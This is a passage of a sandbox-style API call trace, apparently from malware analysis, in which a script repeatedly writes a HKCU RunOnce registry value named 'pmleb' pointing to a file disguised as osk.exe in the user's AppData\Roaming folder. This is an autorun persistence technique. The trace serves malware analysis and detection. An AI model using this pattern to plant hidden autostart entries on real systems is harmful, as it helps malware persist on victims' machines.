cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.173] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x63 [0082.173] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.173] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.173] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0082.173] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.173] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.173] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.173] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.173] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.174] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.174] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.174] RegCloseKey (hKey=0x280) returned 0x0 [0082.174] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.174] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.174] SetTimer (hWnd=0x20280, nIDEvent=0x20df, uElapse=0xa, lpTimerFunc=0x0) returned 0x20df [0082.174] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.186] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.186] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.187] KillTimer (hWnd=0x20280, uIDEvent=0x20df) returned 1 [0082.187] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.187] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.187] IUnknown:Release (This=0x787518) returned 0x1 [0082.187] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.187] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.187] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.187] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.187] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.187] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.188] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.188] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.188] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.188] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x64 [0082.188] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.188] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x65 [0082.188] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.189] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x64 [0082.189] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.189] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.189] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.189] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.189] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 
0x0 [0082.189] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.189] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.189] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.190] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.190] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.190] RegCloseKey (hKey=0x280) returned 0x0 [0082.190] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.190] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.190] SetTimer (hWnd=0x20280, nIDEvent=0x20e0, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e0 [0082.190] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.202] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.202] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.202] KillTimer (hWnd=0x20280, uIDEvent=0x20e0) returned 1 [0082.202] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.202] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.203] IUnknown:Release (This=0x787518) returned 0x1 [0082.203] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.203] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.203] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | 
out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.203] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.203] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.203] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x65 [0082.203] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.203] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x66 [0082.204] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.204] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x65 [0082.204] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.205] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.205] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.205] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.205] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.205] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.205] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.205] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.205] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.205] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
returned 0x0 [0082.206] RegCloseKey (hKey=0x280) returned 0x0 [0082.206] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.206] SetTimer (hWnd=0x20280, nIDEvent=0x20e1, uElapse=0xa, lpTimerFunc=0x0) returned 0x20e1 [0082.206] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.217] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.217] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.218] KillTimer (hWnd=0x20280, uIDEvent=0x20e1) returned 1 [0082.218] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.218] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.218] IUnknown:Release (This=0x787518) returned 0x1 [0082.218] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.218] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.218] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), 
rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.219] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.219] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.219] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x66 
